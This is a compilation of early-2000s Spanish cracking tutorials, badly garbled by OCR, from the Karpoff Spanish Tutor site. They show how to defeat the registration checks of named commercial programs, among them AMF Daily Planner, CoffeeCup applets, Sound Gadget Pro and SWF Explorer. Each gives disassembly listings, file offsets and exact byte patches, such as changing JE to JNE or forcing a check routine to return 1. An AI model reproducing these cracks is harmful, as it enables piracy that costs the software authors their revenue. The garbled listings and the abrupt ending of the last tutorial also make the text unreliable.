Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: AMF Daily Planner and Personal Information 
Manager V8.0 


PROTECCION: Serial 

Objetivo: Simular estar registrados 
Descripcion: 

Dificultad: Principiante 

DOWNLOAD : http://www.amfsoftware.com/ 


e File Inpector v.4 
e W32dsm89 


OS e Editor HEx. (yo uso Hiew 6) 


CRACKER: SiLvEr StOrM FECHA: 15/04/2001 


INTRODUCCION 


Aqui vamos de nuevo con otro tutorial ya he alcanzado la fantastica suma de 7 tutoriales.. (Gjejeje).. gracias a 
todos Uds..., espero que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con fines 


netamente educativos si les interesa este Programa COMPRENLO. 


AL ATAKErr 


Comentario del Programa 


e El programa que nos quitara un rato de nuestro tiempoes un planificador de tiempo... no, la verdad es que si es un programa de ajenda 
para llevar telefonos, recordatorios, etc.. 


e Todos los programas de esta gente usa la misma protección. 
Objetivos 

1. Simular estar Registrados 
Manos a la Obra 


Primero instalaremos nuestro programa: 


vamos a inspecionarlo para ver si esta o no enpaquetado: para esto usamos el programa file inspector. 


(5) file insPEctor v4.2001 


Lo Finatospe | [Hsecdones | :S Importaciones/Exportaciones | 
8 Compilador ] Y modificar | Cf Herramientas | Gi acercade... |] 


Reconocimiento de signaturas 
Compilado con Microsoft Yisual Basic 5 


Signatura: 


<68 EO 31 41 00 Es EE FF FF FF 00 00 00 00 00 
00 30 00 00 00 38 00 00 00 00 00 00 00 FB C9 DD 
49 CD F6 D4 11 8B E9 00 40 OC C2 26 34 00 > 


Versión de la DLL: l. 1 4 Información... 


Versión del SO: fa.0 Versión de la imagen: fa.0 
Versión del enlazador: [6.0 Versión del subsistema: fa. 


Pulsa espacio para ver los niveles de E Abre arca o Alar (e Salir 
compresión pd 


¡CAárchivos de programas 4MF Daily PlannervW'pim. exe 


Jeje.. vemos que esta compilado con Vb 5 -- Easy.... 
Hay varias formas de trabajar este programa: 
1 .- Sería usara smartcheck... funciona. 


2.- Buscar el serial Valido con W32dsm89 o smartcheck. tambien funciona (pero la clave que ellos usan es muy larga y con carcateres 
extraños !me da flojera escrbir todo eso) 


3.- Que acepte cualquier clave ..,. Esta es la que vamos a usar. 


Lo primero que hacemos es ejecutar el programa para ver como nos solicita la clave y que mensaje nos da cuando esta equivocada. 


Disco 
Mi PC ed de mariita 4cceso directo Microsoft 
a Procdump Dutlook 


58 Events for Today: Jj x 
q. ES Task List Help 


No Events Today. Sao A y; MS M 


Monthl Week] Print Close q 


Y 5401/1998 CI Copyright 1992-2001 by Andrew M. Freeman: All Rights Reserved. 
Papelera de Do UNREGISTERED)| [Enter Registration Code Ok | 
Reciclaje | 


3 p- | 
Msn) 156: 05:30 AM 
| 06:00 AM | 
Set Up The 
Microsoft ... 


ca p Planner | Phonebook)_ Dialer |] Mi 


dr 


pill [El AMF Daily Planmer 8: PIM | Drag horizontal divider bars to adjust times. CAPS NUM | 5401/98 


xqKAAA<K<— ooo o 


ll AMPF Daily Planner $: Pli Drag horizontal divider bars to adjust times. APS — |NUM 5401/98 


introducimos cualquier valor y le damos OK. 


Que paso ...... no nos dio ningun error..... bueno si no puedes vencerlo unetele.... vamos a usar tambien pensamiento reverso.... jejeje osea 
vamos a buscar entonces un mensaje de gracias por registrate o algo parecido... 


Desensamblamos el programa con W32dsm89 y nos vamos a las Ref. 


mn. 


¿2 URSoft W32D asm Yer 8.93 Program Disassembler?Debugger 
Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


D0577C5E SD4DBS lea ecx, dword ptr [ebp-48] ES 


* Possible StringData Ref from Code 0b3 ->"Thank You for Registering!" 
| 


200577068 C7857S8FFFFFFOS000000 mov dword ptr [ebp+FFFFFF?8], 00000008 


200577072 FFD? call edi 
:00577C74 8D4DSS lea ecx, dword ptr [ebp-78] 
:00577C077 8D5598 lea edx, dword ptr [ebp-68] 


CODOS RERASSL push ecx 


:00577C7E 

[Oj x 
:00577C7E A 
:0057707F To Search Disassembly for String Data, Double Click on Text Cancel Search | 
:00577C8C 
:00577C83 


:00577C8£ 


* Referer Mia a 


"Thanks." 
:00577C8€ /'The event must end after the time " 
-00577c8c | The file pou selected is too large." 
-00577C084 | The phone log is too large." 
-Dos77c9z2 | This entry already exists.” 
- 0057709: “This entry exists. would you like Ñ 
-D00577C9€ This is an Evaluation Version 


- 00577095 This will end the current Windows 


-00s7709a | day 

Timelnterval 
:00577C9E "Title " sd | 
:00577C9C |»Tiije" 

"TName" y] 
* Referer 

Close | Copy áll Copy View | 
200577C9E 
:00577CA44 SBO06 mov eax, dword ptr [esi] 
:00577CA6 83C414 add esp, 00000014 = 

4 o » 


Line:645991 Pg 8282 and 8283 of 10368 Code Data (2:00577C61 (AMOffset 001 77C61h in FilesW“pim.exe 


J1ji, estos programadores sí son obbios... 


bueno damos doble click y el programa nos lleva al punto donde esta esta referencia. y empezamos a revisar el codigo subimos un poco y 


veremos que hay un salto condicional...... podemos empezar por ahi, revisamos ese salto y vemos que pasa por encima del "gracias por 
registrarte" (interesante verdad...) que tal si 


[52 URSoft W32D asm Ver 8.93 Program Disassembler¿Debugger 


Disassembler Project 


:00577COE 
:00577C14 


Debug Search Goto Execute Text Functions HexData Refs Help 


FF1518134000 
663BFB 


Reference To: MSVEVM60.  vbaFree0bj, Ord: 0000 


| 
Call dword ptr [00401318] 
comp di, bx 


* Reference To: MSVBVM6O.  vbaVarDbup, Ord: 0000h 


:00577C1D 
:00577C23 
:00577C28 
:00577CZB 
:00577C30 
:00577C33 
:00577C39 
:00577C3C 
:00577C3F 


3B3D94124000 
B904000230 
394D90 
B304000000 
394DA0 
SD956SFFFFFF 
3D4DAS 
394583 
3945983 


mov edi, dword ptr [00401294] 
mov ecx, 80020004 

mov dword ptr [ebp-7?0], ecx 

mov eax, O000000A 

mov dword ptr [ebp-60], ecx 

lea edx, dword ptr [ebp+FFFFFF6S] 
lea ecx, dword ptr [ebp-58] 

mov dword ptr [ebp-78], eax 

mov dword ptr [ebp-68], eax 


* Possible StringData Ref from Code 0b3 ->"Thanks." 


: 00577042 
:00577C4C 
:00577C056 
:00577C058 
00577C5E 


C7RSS57?OFFFFFF4C5F4300 
C78S56SFFFFFFOS000000 
FFD”? 

2D957S8FFFFFF 

32D4DES 


| 

mov dword ptr [ebp+FFFFFF?0], 00435F4C 
mov dword ptr [ebp+FFFFFF6S8], 00000008 
call edi 

lea edx, dword ptr [ebp+FFFFFF7S8] 

lea ecx, dword ptr [ebp-48] 


* Possible StringData Ref from Code 0b3 ->"Thank You for Registering!" 


:00577C61 
:00577C68 
: 00577072 
:00577C74 
: 00577077 
:00577C7A 
:00577C7B 


Nransarmr 
4 


C74sso0105F4300 
C73857SFFFFFFOS000000 
FFD”? 

3D4D83 

28D5598 

51 

38D45183 


r> 


| 

mov [ebp-80], 00435F10 

mov dword ptr [ebp+FFFFFF?8], 00000008 
call edi 

lea ecx, dword ptr [ebp-78] 

lea edx, dword ptr [ebp-68] 

push ecx 

lea eax, dword ptr [ebp-58] 


...- - Ne 


| Line:645967 Pg 8282 and 8283 of 10368 Code Data (2:00577C17 MOffset 0017701 7h in FilesW“pim.exe 


nos posicionamos sobre este salto en la 0O57C17 y en la parte de abajo de W32dsm89 vemos donde dice Qoffset y copiamos este numerito 
(00177C17) .. nota : la h es de Hesx . no es parte del offset. 


Buenos nos vamos a nuestro editor Hex. y llegamos hasta este Offsett (00177C17) y cambiamos 
a algo asi: 

00177C17: 0F8514020000 jne 000177E31 

Lo que hicimos fue cambiar el 84 por 85, el resto queda igual.. 

salvamos los cambios y salimos.. 

ejecutamos el programa de nuevo... 


Presionamos un click del mouse sobre "ENTER REGISTRATION CODE." 


Jeje .. de nuevo programa registrado... 


A BusKar El Zeryal 


Otro programa mas crackeado... 
AH se me olvidaba decirles... este programa cuando lo registras crea un archivo en directorio windows llamado PIMREG.INI 


revisenlo para que vean.. jeje . 


nO0TAS 


Este mismo esquema lo usan todos los programas de esta casa de software asi que pueden practicar con todos ellos. 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 
Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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Programa: Applet Headline Factory 4.0 

PROTECCION: Uso limitado en local (no permite internet) 

Objetivo: Estar registrados 

ise ripalent Para hacer applets de ventanas con texto deslizandose para la 
web. 

Dificultad: Novato. 

DOWNLOAD : http://www.coffecup.com 

Herramientas: W32dasm, Editor Hexadecimal 

CRACKER: Lutino FECHA: 15/4/2001 


INTRODUCCION 


Muy buenas de nuevo, este es mi segundo tuto y en el utilizaremos el Applet Headline Factory 4.0 y con el 
veremos como petar todos los programas de coffecup, pues todos estan "protegidos" de la misma manera... 


Con estos programas podremos hacer applets para nuestras web, pero si no estamos registrados solo 
funcionaran en local. 


Lo que no os puedo decir es si son buenos o no, pues no los he probado en este sentido. Eso si, como sean 
igual que la "proteccion" que tienen, seran malisimos. Tal proteccion, tal programa... 


AL ATAKE 


Como siempre, empezaremos reuniendo toda la informacion posible sobre nuestra victima y apuntando TODO lo que nos vayamos 
encontando en el analisis. TODA informacion es util. 


Ejecutemos el programa para ver que pasa... Huy, huy, huy, una nag diciendonos lo que pasa si no estamos registrados... y nos da la 
opcion de registrarnos. Si lo intentamos vemos que esto se hace solicitandolo atraves de internet, lo cual no nos interesa. 


Esto tambien quiere decir que no tendremos donde poner nuestra contraseña y que tampoco tendremos nuestro mensaje de error... 
Por ahi no podremos atacar. ¡No pasa nada! 


Applet Headline Factory E 
| 


Version 4.0 | 
Copyright (C) 1998 CoffeeCup Software | 


www coffeecup .corn | 
UNREGISTERED 


Because this is the unregistered version 
applets will only work on a local hard drive. 


¡8 Rebdister Ok 


Si le damos a OK nos aparece esta pantalla: 


Applet Headline Factory- UNREGISTERED BE 
File Options Help 
í | Headlines | HTML | | 
AA A+ á_— | 
| Here you can adjustthe width and height ofthis Applet. | £»] | 
| P = 4 TestinBrowser |. 
 Applet Width fa00 = AppletHeight[?5 | (a) Background Color (2) | 14 
pl e A A AA A A A] 


| Ifyou wantthis appletto have a border you can change its size, color and style here. 


| Border Width (3 +] Shading [ — Border Style [Raised Frame y] cal Color | 


Scroll Settings Tar A PISE AA E a nr | 
setthe speed and direction which you wantthe textto scroll below. 


| Scroll Speed E = Scroll Delay E | Direction Up y | | 


Scroll Buttons ————=——===H===A4 
” Don't show Scroll Buttons da) Button Color ca) Arrow Color (ES 0 


Button Width hn <] Height fi $] Position [BotomLer y] 


e | 


| Show Preview 


A la derecha tenemos un boton para registrarnos (funciona igual que el anterior, no nos vale), al igual que en una opcion del menu 
Help. Ademas, arriba del todo en la linea de la ventana del programa aparece la palabra UNREGISTERED. Pensemos un poco... 
Eso es!!! Desensamblemos el programa y busquemos la palabra UNREGISTERED y a ver que pasa. 


Cerramos el programa y nos aparece otra bonita nag. Pasando de ella... 


Buy this program now for $25.00 


... OT YOU CAN ... 


Get this and another $250.00 of software 
FREE when you host your Website at 


Bluedomino.com 


Bluedomino give 
ame 
Bandwidth 
d Storage Space 
Unlimited Email Accounts 
and lots more 


Getiit:FREE*! 


Order Now for:$525.00 


Close Window 


Abrimos el W32Dasm y buscamos el ejecutable de nuestro programa para desensamblarlo (haz antes una copia por si te lo cargas 
despues con el editor hexadecimal, aunque este te de la opcion). 


Con el boton de Strings Data References buscamos todas las cadenas que aparezcan en el programa, pero... Sorpresa!!! 
UNREGISTERED no esta... Bueno, pulsa el boton de la linternita, escribe UNREGISTERED y .. Ahora si, aterrizamos aqui: 


* Possible StringData Ref from o bj ->"false" 


:00440F47 B414114000 
¡004M0F4C ESGBOSFIFF 


mov edx, 00441114 
call 004317BC 


:00440FS1 SD55FO lea edx, dword ptr [ebp-10] 
:00440F54 4193384400 mov eax, dword ptr [00443B98] 
:00440FS9 SB00 mov eax, dword ptr [eax] 
:DO4MAIFSE 288018040000 mov eax, dword ptr [eax+00000418] 
:00440F61 ES2608F9FF call 00431780 

:D04MAIFES SBASFO mov eax, dword ptr [ebp-10] 

* Possible StringData Ref from pe 0bj ->"true" 

:00440F69 B424114400 mov edx, 00441124 

:DO4MOFGE ES3930F6FF call M04O3FAL 

:004DF73 7504 jne 004MDF7F 

:D04M0F?S A1CS384400 mov eax, dword ptr [00443808] 
:00440F74, CEOOO1 6l 


:00440F7D EB39 


* Referenced by a (Ulnconditional 
1:00440F73 (0) 


l 
004M0F?F 4198384400 
:00440F34 8800 


mov byte a [eax] . 


¿mp ODAMOFBS 


or (Cjonditional Jump at Address: 


mov eax, dword ptr 


mov eax, dword ptr [ 


[00443898] 
eax] 


:004M0FSE SESOISO3OODO mov eax, dword ptr [eax+00000348] 
:004MFSC B201 mow dl, 81 

¡DOMMPFSE ES1107F9FF call 00431644 

:00440F93 A1983B4000 mov eax, dword ptr [D0443B98] 
:00440F98 SB00 mv eax, dword ptr [eax] 


004M0F9A BA34114400 
:OOAMBFIF ESISOSFIFF 


| 
mov edx, 00441134 
call 004317BC 


:00440FA44 4198384400 mov eax, dword ptr [00443B38] 
:00440FA9 SE00 mov eax, dword ptr [eax] 
:004MBFAB SBSO30030000 mov eax, duord ptr [eax+00000330] 
:00449FB1 201 


:ODAADFE3 ESUOFFAFF 


mov dl, O 
call 00441EF3 


Fijandonos un poquito vemos que 7 lineas mas arriba de donde hemos llegado (donde pone unregistered) nos dice: 
Referenced by a (U)ncondicional or (Cjondicional Jump at Address: 


:004A0F73 (c) 


Nos vamos a esta direccion (solo un poquito mas arriba) y estudiando el codigo de alrededor sacamos estas conclusiones: 
1.- Hace una llamada a una funcion (:004AOF6E call 00403FAC) que comprobara si estamos registrados. 
2.- En 004A0F73 si el resultado de la comprobacion no es igual nos manda a UNREGISTERED, en caso contrario, continua y 3 
linas mas abajo hay un salto incondicional (salta siempre) que nos manda detras de UNREGISTERED, es decir, estamos registrados!!! 


Solo nos queda apuntar el offset, abrir el editor hexadecimal y cambiar el 750A por 740A o bien por 9090 (nop nop). 


Bueno, pues todos los programas de coffecup funcionan igual, yo he probado 2 mas, si alguien quiere practicar con alguno y tiene 
problemas solo tiene que prguntarmelo y le ayudare: lutinoOterra.es 


Pero recuerda, todo esto solo es para aprender y saber como son las entrañas de las cosas, si un programa te gusta, compralo, es lo 
justo. 


Muchas gracias a todos los que dedicais un poco de vuestro tiempo a los tutos, tanto los que los haceis como los que los leeis. 
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Programa: Sound Gadget Pro 1.5.2 

PROTECCION: serial <já!!> 

Objetivo: simular registro 

Descripcion: programa “pa editar soni2 

Dificultad: newbie 

DOWNLOAD : http: //www.compsoc.man.ac.uk/-nigel/SGPro.html 

Herramientas: w32dasm, editor hexa 

CRACKER: smA$|-| s !<esgom FECHA: 23/03/01 
INTRODUCCION 


aaah.. un tutorial más.. ésta vez analizaremos una protección muy fácil.. pero atacaremos de otro modo.. 
quiero agradecer personalmente a [Dek_Oi¡N] <por ponerme crackme'“s difíciles, humillarme y darme uno que 
otro tip..jaja> y al PrOFeSoR_X.. por su gran compilación.. 


también quiero dedicar éste tutorial a sephiroth <mi buen amigo..> y a lariza <excelente amiga!!> que no 
tiene nada que ver pero total.. 


empecemos!!! 


AL ATAKE 


analizamos el archivo con el file insPEctor.. vemos que.. 
> no está comprimido.. 
> hecho en microsoft visual c++ 


ok.. primero analizemos el programa.. al inicio hay una nag diciéndote a gritos "regístrame!!!" hay un botón “pa registrarnos y 
varios abajo.. uno dice click y el botón de ayuda.. damos click al que dice click.. y se abre otro botón.. damos otra vez y se abre 
otro.. y finalmente.. ya entramos al programa.. hmm.. veamos.. ésto no tiene límite de tiempo.. sólo una nag similar a la del winzip 
<de esas en que los botones se mueven..> damos click en register.. ponemos datos falsos y.. 


ok.. con ésta información.. hay que desensamblarlo.. disassambler>open file to..-SGPro muy bien.. damos click en [Ex] para 


buscar nuestro mensaje de error.. damos doble click sobre él y llegamos.. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:0040FF37(C) 


* Possible StringData Ref from Data Obj ->"Error: Registration doesn't match..." 
:0040FFC2 68004C4300 push 00434C00 
* Reference To: MFC42.Ordinal:04B0, Ord:04B0h 


:0040FFC7 ESECDFO0000 Call 0041DFB8 
:0040FFCC SF pop edi 
:0040FFCD SE pop esi 


vemos que el error viene de 0040FF37 entonces le damos Goto>code location apuntamos 0040FF37 y.. llegamos aquí.. 


:0040FF23 E8D8E30000 Call 0041E300 
:0040FF28 50 push eax 

:0040FF29 E8A2A60000 call 0041 A5DO 
:0040FF2E 83C408 add esp, 00000008 
:0040FF31 85CO0 test eax, eax 

:0040FF33 6A00 push 00000000 
:0040FF35 6A00 push 00000000 
:0040FF37 0F8485000000 je 0040 FFC2 


* Possible StringData Ref from Data Obj ->"Registration Accepted - Thanks " 


->"for registering!" 


vemos que hay un je.. qué pasa si cambiamos ese 0f85 por un 0847? no lo sé.. tal vez resulte.. vemos el offset.. 


1337 <sin la h.. la cual significa hexadecimal..> abrimos el editor hex.. edit>goto.. £337 y llegamos a algo así.. 


D0000F334|0064 OOPFr 8465 0000 0068 484€ 4300 Es71 EODOOD O08D|.j._...... hHLC. 


cambiamos el 0F84 <JumpEqual en hex> por 0F85 <JumpNotEqual en hex> 


[nora toos DOOF 6585 0000 0068 454€ 4300 E871 E0O00D O 


hacemos copia de seguridad.. cerramos el w32dasm y guardamos los cambios.. abrimos el sound gadget.. nos registramos.. 


ponemos cualquier dato... <de hecho sin datos entra..> y vemos.. 


sí!! programa crackeado.. ahora la prueba de fuego.. cerramos y abrimos de nuevo el programa.. vemos tristemente que no sigue 
registrado.. borramos el programa cambiado y hacemos otra copia del original.. ahora.. vamos por un método muy bueno que me 
dijo DeK_OIiN <y me enseñó a usarlo..> vamos de nuevo a donde estaba el JE.. 


:0040FF23 E8D8E30000 Call 0041E300 
:0040FF28 50 push eax 

:0040FF29 E8A2A60000 call 0041 A5DO 
:0040FF2E 83C408 add esp, 00000008 
:0040FF31 85CO0 test eax, eax 

:0040FF33 6A00 push 00000000 
:0040FF35 6A00 push 00000000 
:0040FF37 0F8485000000 je 0040 FFC2 


vemos un test eax, eax.. también vemos que hay una call.. nos posicionamos sobre ella y damos click en el botón Es .. llegamos 
aquí.. 

* Referenced by a CALL at Addresses: 

[:0040FF29 , :00412FBB , :0041A5A8 


| 

:0041A5D0 83EC74 sub esp, 00000074 
:0041A5D3 33C0 xor eax, eax 

:0041A5D5 B90C000000 mov ecx, 0000000C 
:0041A5DA 53 push ebx 

:0041A5DB 56 push esi 

:0041A5DC 57 push edi 

:0041A5DD 8D7C2418 lea edi, dword ptr [esp+18] 
:0041A5E1 55 push ebp 

:0041A5E2 F3 repz 

:0041A5E3 AB stosd 

:0041A5E4 66AB stosw 

:0041A5E6 8D7C2450 lea edi, dword ptr [esp+50] 
:0041ASEA B90C000000 mov ecx, 0000000C 


vaya vaya.. qué haremos?? vamos a hacer que eax siempre suelte el valor de 1 <registrado> y no de O <error!!> pero cómo 
sacaremos el valor de mov eax, 00000001 <“pa que siempre suelte 1>?? el w32 dasm tiene un debugger.. lo utilizaremos.. abrimos 
w32dasm damos Ctrl+L y le clickeamos al botón de load... ahora al botón de patch code.. dentro ponemos 

mov eax, 00000001 

ahora.. nos va a dar esto.. 

b801000000 <que es mov eax, 00000001 en hex> 

pero.. ojo!! no podemos parchear nomás así.. hay que parchear al inicio de la call oséase en.. 

:0041A5D0 83EC74 sub esp, 00000074 

no se olviden del C3 <ret> para que retorne de la call inmediatamente despues de que metemos eax a l, y asi no se vaya 

a alterar el valor con las posteriores operaciones. 


después de ésta breve explicación continuamos.. vemos el offset de 0041A5DO que es 199D0 abrimos el editor hex y llegamos a 
aquel punto.. 


000199C4|CCcc Cccle Ccece Cccl Ccccl CCC. BIE 7433 COB9 0OCOO 


y cambiamos.. 


00019904 |Cccece Ecccel ccel ccele Cccee Cccece Bs01 0000 DOCS PCOD|......oooooooo....z. 


como ven.. cambiamos los valores de 83EC7433C0B9 a.. B801000000<hasta aquí es mov eax, 00000001>C3<no olvidemos el 
return> guardamos los cambios y ejecutamos el programa.. lo llenamos con los datos que sean.. 


de hecho.. lo que más me gustó es que ni siquiera checa si el ++ es correcto.. así vemos en about.. 


como ven.. el programa ni siquiera checó el dato <porque no se lo dejamos!!> jeje.. espero se hayan divertido tanto como yo!! 


>>>despedida.. 


como dije.. es una protección malona.. no está muy buena que digamos.. pero así aprendemos 
más.. jeje.. de nuevo agradezco a DeK_OIiN por enseñarme a usar éste truco.. y tambié a to2 los 
crackers que han aportado sus conocimientos!! también salu2 a los newbies!! 


por último, les recomiendo echen un ojo por éstas páginas... 


AZTIAnKIlAn 


Karpoff Spanish Tutor 


WKT! Foro 


TutoLetal 


K-For 


hasta la próxima!! 
dudas? comentarios?? 


smash O gamehacks.net 


recuerda: éstos textos son exclusivamente para fines intelectuales.. de ninguna manera 
tratamos de perjudicar a los programadores.. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: SWF Explorer 2.93 

PROTECCION: serial 

Objetivo: simular registro 

Descripcion: busca películas de flash en el disco duro... 

Dificultad: newbie+ 

DOWNLOAD : http: //www.swifftools.com/stools/ 

Herramientas: w32dasm, editor hexadecimal 

CRACKER: smÁs|-| £ 1<EKBB0m FECHA: 23/03/01 
INTRODUCCION 


salu2!! cómo se la están pasando?? han crackeado muchos programas?? <ojalá crackeen más que yo.. jeje..> 
ésta vez me encontré con un programa un poco interesante.. resulta que primero me sacó de onda pero 
después ya supe qué hacer.. como siempre, agradezco al PrFeSoR_X por su gran compilación, a karpoff 
por su excelente página y a to2 los miembros de k-for.. thanx.. 


éste tutorial lo dedico a todo el crew de pokemex 


bueno.. es todo empecemos!!! 


AL ATAKE 


primero.. como todo buen cazador hay que ver el comportamiento de nuestra presa.. analicémosla con file insPEctor.. 
>>hecho en delphi 3.0 

>>no está comprimido.. 

ejecutamos el programa y una no muy agradable nag.. 


Browser 


CGrooveware Multimedia '99-00 


"éste programa es freeware" "blablabla" "págame".. el botón de continue está bloqueado por unos segun2.. 


tratamos de registrarnos.. 


muy bien.. empecemos a jugar con el código muerto <desensamblar..> cerramos el programa y abrimos el w32dasm y 


desensamblamos.. 


hmm.. está tardando algo.. 

esto es demasiado.. 

eeeh.. ya?? 

con razón.. el programa son 1.15 megas.. 
un poco más.. ya!! 


damos click al botón [Es] y buscamos "the serial number is..” un poco abajo.. casi por el final lo encontramos 
doble click.. y llegamos aquí.. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:004A99C8(C) 


:004A9A60 6A00 push 00000000 
:004A9A62 668BO0ODA49A4A00 mov cx, word ptr [004A9A A4] 
:004A9A69 B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"The serial number is invalid." 


:004A9A6B B8409B4A00 mov eax, 004A9B40 
:004A9A70 E823B6FAFF call 00455098 
:004A9A75 8BC3 mov eax, ebx 

:004A9A77 ESE4FCFO9FF call 00449760 


vemos que el mensaje de error viene directamente de 004A99C8 vamos a Goto>Code Location y apuntamos 
004A99C8 para llegar aquí.. 


.. damos 


[...] 

:004A99C0 59 pop ecx 

:004A99C1 ES06FEFFFF call 004A97CC 

:004A90C6 84CO0 test al, al 

:004A99C8 0F8492000000 je 004A9A60 

:004A99CE 6A00 push 00000000 

:004A99D0 668B0ODA49A4A00 mov cx, word ptr [004A9AA4] 
:004A99D7 B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Thank you for registering SWF" 
->"Browser!" 


vemos que hay un jump if equal <JE> que salta siempre y cuando es igual.. <se refiere al + de registro real y al que 
introducimos..> como siempre.. hay que cambiarlo por un JNE <jump if not equal> “pa que salte cuando no esté bien.. 
así simularemos estar registra2 <pero me preocupa aquella call..> vemos el offset <el que está hasta abajo del 
desensamblador, dice algo así.. 

Offset ODODASCE2h> sólo tomaremos A8CE?2, los Os sobran y la h significa hex.. 


abrimos el editor hex.. <no antes sin hacer una copia de seguridad..> abrimos la copia y vamos edit>goto y apuntamos 
A8CEZ2 llegaremos aquí.. 59E8 O6FE FFFF 84C0 0F84 9200 reemplazamos 0F84 <JE> por 0F85 <JNE> guardamos 
cambios y ejecutamos el programa.. e introducimos datos falsos “pa registrarnos.. 


muy bien!! ahora: la prueba de fuego.. cerramos el programa y lo abrimos de nuevo.. hmm.. se está tardando un poco 
no??.. esto es mucho!! demasiado diría yo.. presionamos Ctrl+Alt+Supr y vemos que ahí está el programa corriendo.. 
pero por alguna extraña razón no podemos "tocarlo" hmm.. seleccionamos el SWFExplorer y le damos click a 
"Finalizar Tarea" esperamos unos momentos más.. y nos dirá <o al menos a mí> que está atorado.. presionamos 
"Finalizar" de nuevo y pensamos.. 

una trampa del programador?? no tocar específicamente ese punto?? o simplemente algún error?? tal vez.. la del 
programador no me la creo pero.. puede ser posible.. tendremos que utilizar otro método.. pero.. el programa no corre.. 
qué extraño no?? 


empecemos a hacer algo desesperado.. reiniciemos.. <o más fácil: desinstalamos el programa y lo volvemos a 
instalar!!> 


ahora chequemos de nuevo de dónde estaba ese JE 


:004A99C0 59 pop ecx 

:004A99C1 ESO06FEFFFF call 004A97CC 

:004A909C6 84C0 test al, al 

:004A99C8 0F8492000000 je 004A9A60 

:004A99CE 6A00 push 00000000 

:004A99D0 668B0ODA49A4A00 mov cx, word ptr [004A9AA4] 
:004A99D7 B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Thank you for registering SWF" 
->"Browser!" 


vemos un interesantísimo test al, al que chequea nuestros datos.. por ahí está un hoyo.. ya lo veo.. nos posesionamos 


sobre el call y presionamos Es] llegaremos aquí.. 


:004A97CC 55 push ebp 
:004A97CD 8BEC mov ebp, esp 
:004A97CE 6A00 push 00000000 
:004A97D1 6A00 push 00000000 
:004A97D3 6A00 push 00000000 
:004A97D5 6A00 push 00000000 
:004A97D7 6A00 push 00000000 


lo que haremos es obligar al programa a que siempre saque registrado! en lugar de error!! reemplazaremos lo que se 
necesite por mov al, 0000001 cómo le haremos?? con el w32dasm tiene la función de debugger.. damos Ctrl+L, damos 
click a Load, vamos a Patch Code y escribimos mov al, 0000001 así nos dará.. BOO1 <que es la instrucción que 
acabamos de escribir en hexa> no olvidemos que si sólo parcheamos B001 vamos a provocar que el programa tenga 
error.. así que le agregamos un RET <C3>.. quedaría así.. 

B001 C3 

ahora vemos el offset <de push ebp, donde empieza el call>..nos dice.. ASBCC, muy bien lo anotamos, abrimos el 
editor hex.. edit>goto ASBCC y llegamos aquí.. 


558B EC6A 006A 006A 006A 006A 
parcheamos y quedaría algo así.. 
B001 C36A 006A 006A 006A 006A guardamos cambios. . 


llenamos datos del registro.. damos click en register.. y.. 


cerramos el programa y lo volvemos a abrir.. 
1-- ya no hay nag.. 
2-- “tamoz registra2..!!! 


finalmente.. aah.. se siente tan bien!! 


>>>despedida.. 


Ijeje.. bueno se acabó el SWF Browser sí me hizo sudar un ratito <ajá..> pero sabiendo 
qué es lo que hace.. uno se puede plantear otros caminos.. agradezco al PrOFeSoR_X, 
a Karpoff y a todo K-For.. especialmente a DeK_OIiN y a Viper, por su file insPEctor.. 
ya que sin ellos no sería nada.. también mando salu2 a los newbies!! 


por último, les recomiendo echen un ojo por éstas páginas... 


AZTIAnKIlAn 


Karpoff Spanish Tutor 


WKT! Foro 
TutoLetal 
K-For 


hasta la próxima!! 
dudas? comentarios?? 


smash O gamehacks.net 


recuerda: éstos textos son exclusivamente para fines intelectuales. de ninguna 
manera tratamos de perjudicar a los programadores.. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


to2 de X3 software 


name/serial 

simular registro 

newbie- 

http: //www.x3software.com 
w32dasm, editor hexadecimal 


smAs|-| s !<eggom FECHA: 26/03/01 


INTRODUCCION 


vaya vaya.. estaba buscando una protección 2-3.. malona si quieren llamarle así.. pero éstos se excedieron!! 
de hecho.. no sé qué es peor.. toggle o éstos.. tal vez toggle es mejor.. pero.. bueno.. qué le haremos?? “poz 
les daremos una lección.. por lo menos lo hubieran encriptado o algo así.. 


bueno.. dedico éste tuto a lecome <al rato te entrego otro capítulo..> y a blizzard <sé que no estás leyendo 
esto pero.. “poz “pa que la lleves calmado..> aunque ambos no tienen nada que ver me han ayudado mucho.. 
palabras que ayudan.. 


bueno.. empecemos!!! 


AL ATAKE 


primero.. veamos el comportamiento del programa.. tomaré como ejemplo el CodeWiz.. una aplicación que no se ni 
“pa que sirve!! pero.. ok.. 


damos click a Register.. y llenamos nuestros datos.. 


Smási 
SHÁTE(AÁTE?? what is hat?12 


damos click a o!< y sorpresa!!! 


invalid?? seguro?? analizamos el programa con file insPEctor y vemos.. 


<55 8B EC 64 FF 68 18 4€ 40 00 68 €8 30 40 00 
64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 


68 53 56 57 89 65 ES 33 DB 89 5D FC 64 02 > 


visual c++.. procedemos a desensamblarlo.. presionamos [| y buscamos "invalid registration code" las referencias 
son MUY pocas.. no hay pierde.. damos doble click sobre la referencia y veremos algo así.. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00402749(C) 


